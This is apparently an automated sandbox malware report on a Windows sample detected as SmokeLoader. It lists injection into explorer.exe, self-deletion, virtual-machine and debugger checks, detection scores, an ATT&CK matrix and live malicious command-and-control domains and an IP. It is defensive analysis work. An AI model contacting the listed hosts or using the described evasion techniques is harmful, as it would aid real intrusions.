Source: C:\Users\user\Desktop\br0A8E2X6I.exe	Code function: 0_2_004F1CCB push es; retf	0_2_004F1CEA
Source: C:\Users\user\Desktop\br0A8E2X6I.exe	Code function: 0_2_004F2FF8 push 60B44389h; retf	0_2_004F3012

Source: br0A8E2X6I.exe	Static PE information: section name: .text entropy: 7.422171603883306
Source: rdihhcd.2.dr	Static PE information: section name: .text entropy: 7.422171603883306

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\rdihhcd

Jump to dropped file

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\rdihhcd

Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Deletes itself after installation

Source: C:\Windows\explorer.exe

File deleted: c:\users\user\desktop\br0a8e2x6i.exe

Jump to behavior

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\explorer.exe

File opened: C:\Users\user\AppData\Roaming\rdihhcd:Zone.Identifier read attributes | delete

Jump to behavior

Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Checks if the current machine is a virtual machine (disk enumeration)

Source: C:\Users\user\Desktop\br0A8E2X6I.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\br0A8E2X6I.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\br0A8E2X6I.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\br0A8E2X6I.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\br0A8E2X6I.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\br0A8E2X6I.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\br0A8E2X6I.exe	API/Special instruction interceptor: Address: 7FF8C88EE814
Source: C:\Users\user\Desktop\br0A8E2X6I.exe	API/Special instruction interceptor: Address: 7FF8C88ED584

Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 460	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 878	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 867	Jump to behavior

Source: C:\Windows\explorer.exe TID: 3784

Thread sleep count: 460 > 30

Jump to behavior

Source: explorer.exe, 00000002.00000000.2077257852.00000000076F8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}99105f770555d7dd
Source: explorer.exe, 00000002.00000003.3096144958.0000000009BB3000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
Source: explorer.exe, 00000002.00000002.3272482280.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3096144958.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2078773166.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW0r
Source: explorer.exe, 00000002.00000003.3096144958.0000000009BB3000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000002.00000003.3096144958.0000000009BB3000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NXTcaVMWare
Source: explorer.exe, 00000002.00000003.3096144958.0000000009BB3000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000002.00000003.3096144958.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000%
Source: explorer.exe, 00000002.00000003.3094228937.000000000354D000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.
Source: explorer.exe, 00000002.00000003.3096144958.0000000009BB3000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000002.00000003.3094228937.000000000354D000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware-42 27 d9 2e dc 89 72 dX
Source: explorer.exe, 00000002.00000002.3268026747.0000000000F13000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000A
Source: explorer.exe, 00000002.00000000.2077257852.00000000076F8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}^
Source: explorer.exe, 00000002.00000002.3272482280.0000000009B2C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3096144958.0000000009B2C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2078773166.0000000009B2C000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000002.00000003.3094228937.000000000354D000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.NoneVMware-42 27 d9 2e dc 89 72 dX
Source: explorer.exe, 00000002.00000003.3094228937.000000000354D000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware,p
Source: explorer.exe, 00000002.00000003.3096144958.0000000009BB3000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000_
Source: explorer.exe, 00000002.00000003.3096144958.0000000009BB3000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}0#{5-
Source: explorer.exe, 00000002.00000002.3268026747.0000000000F13000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: explorer.exe, 00000002.00000003.3096144958.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000002.00000003.3095264105.000000000769A000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Users\user\Desktop\br0A8E2X6I.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\br0A8E2X6I.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Source: C:\Users\user\Desktop\br0A8E2X6I.exe

System information queried: CodeIntegrityInformation

Jump to behavior

Source: C:\Users\user\Desktop\br0A8E2X6I.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Users\user\Desktop\br0A8E2X6I.exe	Code function: 0_2_004F092B mov eax, dword ptr fs:[00000030h]	0_2_004F092B
Source: C:\Users\user\Desktop\br0A8E2X6I.exe	Code function: 0_2_004F0D90 mov eax, dword ptr fs:[00000030h]	0_2_004F0D90
Source: C:\Users\user\Desktop\br0A8E2X6I.exe	Code function: 0_2_005F4525 push dword ptr fs:[00000030h]	0_2_005F4525

HIPS / PFW / Operating System Protection Evasion

Benign windows process drops PE files

Source: C:\Windows\explorer.exe

File created: rdihhcd.2.dr

Jump to dropped file

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe

Network Connect: 188.40.141.211 80

Jump to behavior

Creates a thread in another existing process (thread injection)

Source: C:\Users\user\Desktop\br0A8E2X6I.exe

Thread created: C:\Windows\explorer.exe EIP: 1121A88

Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\br0A8E2X6I.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write			Jump to behavior
Source: C:\Users\user\Desktop\br0A8E2X6I.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read			Jump to behavior

Source: explorer.exe, 00000002.00000000.2078773166.0000000009BB3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3272482280.0000000009BB3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3096144958.0000000009BB3000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd=
Source: explorer.exe, 00000002.00000000.2076060157.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000002.3268615891.0000000001731000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000002.00000000.2076060157.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2077053592.0000000004B00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3268615891.0000000001731000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000002.00000000.2076060157.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000002.3268615891.0000000001731000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000002.00000000.2076060157.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000002.3268615891.0000000001731000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000002.00000002.3268026747.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2075690937.0000000000EF8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: PProgman

Source: C:\Windows\explorer.exe

Code function: 2_2_011235B8 GetUserNameW,

2_2_011235B8

Stealing of Sensitive Information

Yara detected SmokeLoader

Source: Yara match	File source: 00000000.00000002.2097598650.0000000000510000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3268206888.0000000001121000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2097653376.0000000000541000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected SmokeLoader

Source: Yara match	File source: 00000000.00000002.2097598650.0000000000510000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3268206888.0000000001121000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2097653376.0000000000541000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Exploitation for Client Execution	1 DLL Side-Loading	31 Process Injection	11 Masquerading	OS Credential Dumping	411 Security Software Discovery	Remote Services	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	12 Virtualization/Sandbox Evasion	LSASS Memory	12 Virtualization/Sandbox Evasion	Remote Desktop Protocol	Data from Removable Media	2 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	31 Process Injection	Security Account Manager	3 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Hidden Files and Directories	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	113 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	2 Obfuscated Files or Information	LSA Secrets	1 Account Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	12 Software Packing	Cached Domain Credentials	1 System Owner/User Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	13 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 File Deletion	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
br0A8E2X6I.exe	76%	ReversingLabs	Win32.Trojan.Brresmon
br0A8E2X6I.exe	75%	Virustotal		Browse
br0A8E2X6I.exe	100%	Avira	HEUR/AGEN.1307711
br0A8E2X6I.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\rdihhcd	100%	Avira	HEUR/AGEN.1307711
C:\Users\user\AppData\Roaming\rdihhcd	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\rdihhcd	76%	ReversingLabs	Win32.Trojan.Brresmon
C:\Users\user\AppData\Roaming\rdihhcd	75%	Virustotal		Browse

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
selebration17io.io	17%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
https://word.office.comon	0%	URL Reputation	safe
https://word.office.comon	0%	URL Reputation	safe
https://android.notify.windows.com/iOS	0%	URL Reputation	safe
https://powerpoint.office.comcember	0%	URL Reputation	safe
https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe	0%	URL Reputation	safe
https://api.msn.com/	0%	URL Reputation	safe
https://excel.office.com	0%	URL Reputation	safe
http://www.autoitscript.com/autoit3/J	0%	Avira URL Cloud	safe
http://www.autoitscript.com/autoit3/J	0%	Virustotal		Browse
http://goodfooggooftool.net/index.php	16%	Virustotal		Browse
http://valarioulinity1.net/index.php	15%	Virustotal		Browse
http://selebration17io.io/index.php	15%	Virustotal		Browse
http://cassiosssionunu.me/index.php	14%	Virustotal		Browse
http://goodfooggooftool.net/index.php	100%	Avira URL Cloud	malware
http://valarioulinity1.net/index.php	100%	Avira URL Cloud	malware
http://cassiosssionunu.me/index.php	100%	Avira URL Cloud	malware
http://smiodprqlvtv.net/application/x-www-form-urlencodedMozilla/5.0	0%	Avira URL Cloud	safe
http://vacantion18ffeu.cc/index.php	100%	Avira URL Cloud	malware
http://selebration17io.io/index.php	100%	Avira URL Cloud	phishing
http://schemas.micro	0%	URL Reputation	safe
http://crl.v	0%	URL Reputation	safe
https://outlook.com	0%	URL Reputation	safe
https://wns.windows.com/)s	0%	URL Reputation	safe
http://buriatiarutuhuob.net/index.php	16%	Virustotal		Browse
http://vacantion18ffeu.cc/index.php	21%	Virustotal		Browse
http://sulugilioiu19.net/index.php	14%	Virustotal		Browse
http://smiodprqlvtv.net/	0%	Avira URL Cloud	safe
http://sulugilioiu19.net/index.php	100%	Avira URL Cloud	malware
http://buriatiarutuhuob.net/index.php	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
selebration17io.io	188.40.141.211	true	true	17%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://goodfooggooftool.net/index.php	true	16%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://valarioulinity1.net/index.php	true	15%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://cassiosssionunu.me/index.php	true	14%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://selebration17io.io/index.php	true	15%, Virustotal, Browse Avira URL Cloud: phishing	unknown
http://vacantion18ffeu.cc/index.php	true	21%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://sulugilioiu19.net/index.php	true	14%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://buriatiarutuhuob.net/index.php	true	16%, Virustotal, Browse Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://word.office.comon	explorer.exe, 00000002.00000002.3272482280.00000000099B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3096144958.00000000099BF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2078773166.00000000099C0000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
http://www.autoitscript.com/autoit3/J	explorer.exe, 00000002.00000002.3275682540.000000000C81C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2081841615.000000000C81C000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://android.notify.windows.com/iOS	explorer.exe, 00000002.00000003.3095264105.00000000076F8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3270338419.00000000076F8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2077257852.00000000076F8000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://powerpoint.office.comcember	explorer.exe, 00000002.00000002.3275032244.000000000C460000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2081353082.000000000C460000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://smiodprqlvtv.net/application/x-www-form-urlencodedMozilla/5.0	explorer.exe, 00000002.00000003.3096930645.0000000003534000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095948833.0000000003531000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe	explorer.exe, 00000002.00000003.3095522768.000000000C547000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3094758629.000000000C514000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2081353082.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3275303144.000000000C518000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.msn.com/	explorer.exe, 00000002.00000003.3096144958.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2078773166.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3272482280.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://excel.office.com	explorer.exe, 00000002.00000000.2078773166.0000000009BB3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3272482280.0000000009BB3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3096144958.0000000009BB3000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.micro	explorer.exe, 00000002.00000000.2077924540.0000000007DC0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2078364506.0000000008890000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2078340556.0000000008870000.00000002.00000001.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crl.v	explorer.exe, 00000002.00000000.2075690937.0000000000F13000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3268026747.0000000000F13000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://outlook.com	explorer.exe, 00000002.00000000.2078773166.0000000009BB3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3272482280.0000000009D42000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3096144958.0000000009D42000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://smiodprqlvtv.net/	explorer.exe, 00000002.00000003.3096930645.0000000003534000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095948833.0000000003531000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://wns.windows.com/)s	explorer.exe, 00000002.00000002.3272482280.00000000099B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3096144958.00000000099BF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2078773166.00000000099C0000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
188.40.141.211	selebration17io.io	Germany		24940	HETZNER-ASDE	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1496330
Start date and time:	2024-08-21 07:10:13 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 42s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	4
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	br0A8E2X6I.exe renamed because original name is a hash value
Original Sample Name:	cb9d1ebc73719f1434f92e6648b4815c01dadef4761f7cc4e91561ce34da6346.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@1/2@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 33 Number of non-executed functions: 6
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, 6.0.1.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.7.0.0.0.0.3.0.1.3.0.6.2.ip6.arpa, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
01:11:10	API Interceptor	589x Sleep call for process: explorer.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
188.40.141.211	setup.exe	Get hash	malicious	Babuk, Djvu	Browse	zexeq.com/test2/get.php?pid=63423FF445583FE5A9A41B7CFEC3D9C4&first=true
	SecuriteInfo.com.Win32.Evo-gen.21074.1738.exe	Get hash	malicious	SmokeLoader	Browse	agressivemnaiq.xyz/
	A9BCD8D127BE95C64EDAE5CDD2379494A37D458FD9D5881D74F8D5487A805E6C.exe	Get hash	malicious	Bdaejec, SmokeLoader	Browse	host-data-coin-11.com/
	be1c79275d836696a00b258d15a8b337a8c9beb8198a5bd3d5aaf64d660c8005_dump.exe	Get hash	malicious	SmokeLoader	Browse	host-data-coin-11.com/
	EF2D1DE8BE7B216F6983BD43D120B512A0917EBE887F30D256ECA8395CE613CC.exe	Get hash	malicious	Bdaejec, SmokeLoader	Browse	host-data-coin-11.com/
	LisectAVT_2403002B_303.exe	Get hash	malicious	Bdaejec, SmokeLoader	Browse	aucmoney.com/upload/
	LisectAVT_2403002C_47.exe	Get hash	malicious	SmokeLoader	Browse	trad-einmyus.com/index.php
	EF48AEBC0F1E77208BBCD5206C58678BB1181994507D1084E1D324DCA9D5D3B8.exe	Get hash	malicious	Bdaejec, SmokeLoader	Browse	host-data-coin-11.com/
	E6D881EA9A11D23E31737469C38C5C74DE54ADC680A662D877C6CAB46E3A34AB.exe	Get hash	malicious	Bdaejec, SmokeLoader	Browse	host-data-coin-11.com/
	D9B72DA68DB9EB3D54BFD70C71F9A07EF222B7D9662DE35E74BA080B473DF4E2.exe	Get hash	malicious	Bdaejec, SmokeLoader	Browse	host-data-coin-11.com/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
selebration17io.io	987123[1].exe	Get hash	malicious	Bdaejec, SmokeLoader	Browse	188.40.141.211
	Vjt694rffx.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, PureLog Stealer, RedLine, RisePro Stealer, SmokeLoader	Browse	91.215.85.120
	ak55ZgXKwt.exe	Get hash	malicious	LummaC, Glupteba, LummaC Stealer, Mars Stealer, PureLog Stealer, SmokeLoader, Socks5Systemz	Browse	91.215.85.120
	tZksysDKeT.exe	Get hash	malicious	LummaC, Glupteba, LummaC Stealer, Mars Stealer, PureLog Stealer, SmokeLoader, Socks5Systemz	Browse	91.215.85.120
	woM8Z8CFYx.exe	Get hash	malicious	LummaC, Glupteba, LummaC Stealer, Mars Stealer, SmokeLoader, Socks5Systemz, Stealc	Browse	91.215.85.120
	6t0abj5L0W.exe	Get hash	malicious	LummaC, Glupteba, LummaC Stealer, Mars Stealer, PureLog Stealer, SmokeLoader, Socks5Systemz	Browse	91.215.85.120
	UUVupNLfBb.exe	Get hash	malicious	LummaC, Glupteba, LummaC Stealer, Mars Stealer, PureLog Stealer, SmokeLoader, Socks5Systemz	Browse	91.215.85.120
	FNzQAE7DvU.exe	Get hash	malicious	LummaC, Glupteba, LummaC Stealer, Mars Stealer, PureLog Stealer, SmokeLoader, Socks5Systemz	Browse	91.215.85.120
